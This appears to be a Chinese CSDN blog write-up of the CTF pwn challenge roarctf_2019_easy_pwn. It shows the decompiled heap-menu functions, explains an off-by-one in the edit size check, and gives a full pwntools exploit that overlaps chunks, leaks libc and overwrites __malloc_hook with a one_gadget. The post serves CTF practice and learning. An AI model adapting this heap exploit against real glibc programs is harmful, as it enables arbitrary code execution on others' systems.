roarctf_2019_easy_pwn

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量189 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133532152
版权

roarctf_2019_easy_pwn

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位,保护全开

__int64 ADD()
{
  __int64 result; // rax
  int i; // [rsp+4h] [rbp-1Ch]
  int v2; // [rsp+8h] [rbp-18h]
  int v3; // [rsp+8h] [rbp-18h]
  void *v4; // [rsp+10h] [rbp-10h]

  result = 0LL;
  for ( i = 0; i <= 15; ++i )
  {
    result = *((unsigned int *)&BSSFLAG + 4 * i);
    if ( !(_DWORD)result )
    {
      printf("size: ");
      v3 = READ(v2);
      if ( v3 > 0 )
      {
        if ( v3 > 0x1000 )
          v3 = 4096;
        v4 = calloc(v3, 1uLL);
        if ( !v4 )
          exit(-1);
        *((_DWORD *)&BSSFLAG + 4 * i) = 1;
        *((_DWORD *)&BSSSIZE + 4 * i) = v3;
        BSSPTR[2 * i] = v4;
        printf("the index of ticket is %d \n", (unsigned int)i);
      }
      return (unsigned int)i;
    }
  }
  return result;
}

add这里,size创建不能大于0x1000,

__int64 EDIT()
{
  int v1; // [rsp+Ch] [rbp-14h]
  unsigned int idx; // [rsp+Ch] [rbp-14h]
  unsigned int v3; // [rsp+10h] [rbp-10h]
  unsigned int v4; // [rsp+14h] [rbp-Ch]

  printf("index: ");
  idx = READ(v1);
  v3 = idx;
  if ( idx <= 0xF )
  {
    idx = *((_DWORD *)&BSSFLAG + 4 * (int)idx);
    if ( idx == 1 )
    {
      printf("size: ");
      idx = READ(1);
      v4 = sub_E26(*((unsigned int *)&BSSSIZE + 4 * (int)v3), idx);
      if ( (int)idx > 0 )
      {
        printf("content: ");
        return (unsigned int)sub_D92(BSSPTR[2 * (int)v3], v4);
      }
    }
  }
  return idx;
}

edit这里乍一看没啥,实际上有个size的比较函数

__int64 __fastcall sub_E26(int a1, unsigned int a2)
{
  __int64 result; // rax

  if ( a1 > (int)a2 )
    return a2;
  if ( a2 - a1 == 0xA )
    LODWORD(result) = a1 + 1;
  else
    LODWORD(result) = a1;
  return (unsigned int)result;
}

这里如果从edit里面输入的size,跟你申请的size相差0xa就能有个off by one

__int64 DELE()
{
  int idx; // eax
  int v2; // [rsp+Ch] [rbp-14h]
  int v3; // [rsp+10h] [rbp-10h]
  __int64 v4; // [rsp+10h] [rbp-10h]

  printf("index: ");
  idx = READ(v3);
  v4 = idx;
  v2 = idx;
  if ( (unsigned __int64)idx <= 0xF )
  {
    v4 = *((int *)&BSSFLAG + 4 * idx);
    if ( v4 == 1 )
    {
      *((_DWORD *)&BSSFLAG + 4 * idx) = 0;
      *((_DWORD *)&BSSSIZE + 4 * idx) = 0;
      free((void *)BSSPTR[2 * idx]);
      BSSPTR[2 * v2] = 0LL;
    }
  }
  return v4;
}

dele这里没有uaf

__int64 SHOW()
{
  int v1; // [rsp+0h] [rbp-10h]
  unsigned int idx; // [rsp+0h] [rbp-10h]
  unsigned int v3; // [rsp+4h] [rbp-Ch]

  printf("index: ");
  idx = READ(v1);
  v3 = idx;
  if ( idx <= 0xF )
  {
    idx = *((_DWORD *)&BSSFLAG + 4 * (int)idx);
    if ( idx == 1 )
    {
      printf("content: ");
      return (unsigned int)sub_108E(BSSPTR[2 * (int)v3], *((unsigned int *)&BSSSIZE + 4 * (int)v3));
    }
  }
  return idx;
}

show这里判断申请那个值是否为1,才给你show

思路

利用off by one堆复用,泄露libc,构造fake chunk,打malloc_hook

from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')
r,elf=rec("node4.buuoj.cn",29821,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
#debug('b *0x400649')
#debug('b *$rebase(0x1466)')

add(0x18)#0
add(0x10)#1
add(0x90)#2
add(0x10)#3
edit(0,0x22,b'a'*0x10+p64(0x20)+p8(0xa1))
edit(2,0x80,p64(0)*14+p64(0xa0)+p64(0x21))
dele(1)
add(0x90)#1
edit(1,0x20,p64(0)*3+p64(0xa1))
dele(2)
show(1)
leak=get_addr_u64()-mallochook()-88-0x10
li(leak)
sys=system(leak)
malloc=mallochook(leak)
realloc=reallochook(leak)
add(0x80)
edit(1,0x90,p64(0)*3+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21))
dele(2)
edit(1,0x30,p64(0)*3+p64(0x71)+p64(malloc-0x23)*2)
add(0x68)
add(0x68)#4
one=[0x45216,0x4526a,0xf02a4,0xf1147]
edit(4,11+8+8,b'a'*(3+8)+p64(leak+one[3])+p64(realloc+4))
add(0x10)

ia()

参考主要是这个师傅,讲的太详细了,我写的文笔也没那么好
在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RoarCTF2019部分Writeup
Sea_Sand息禅
11-29 795
Easy Calc 页面源码线索中得到calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"'...
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 554
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1110
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
2301_79326813的博客
02-03 1392
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2238
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
roarctf_2019_easy_pwn 1/100
m0_57754423的博客
02-22 1490
edit chunk的功能里 存在off_by_one漏洞。 利用思路: 构造堆块重叠 然后house of sprit。 exp: from pwn import * p = process("./roarctf_2019_easy_pwn") e = ELF("./roarctf_2019_easy_pwn") libc = e.libc context.log_level = "debug" p.timeout = 0.1 def add(size): p.recvuntil("./ch
roarctf_2019_easy_pwn的wp
wuyvle的博客
03-07 197
一个堆题 add函数 2.free 很完美,没什么漏洞 3.edit 里面有个判断大小的函数 存在obo漏洞,当edit的大小比申请多10会多输入一个字节 这道题的思路是通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改malloc_hook地址处的内容为one gadget地址 首先利用Unsorted bin泄露libc的地址 我们先申请4个chunk add(0x18)#idx0 add(0x10)#idx1 add(0x90)#idx2 add(0x10)
roarctf_2019_easyheap
z1r0的博客
04-10 401
roarctf_2019_easyheap 查看保护 有一个大uaf,show的条件是bss上的一个数据应该 为0xdead… 在666中可以进行删除和创建,这里有一个bug,602010这个数据变成0之后–就是成负数可以无限次使用了 攻击思路:因为有uaf和666这个功能,所以我们构造fastbin attack 形成double free,其实fastbin attack使用的是fastbin_dup_consolidate这个手法。构造出double free之后将堆申请到name_addr这里
pwnroarctf_2019_easy_pwn
Nothing
12-24 2078
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 240
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 541
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 178
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 312
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值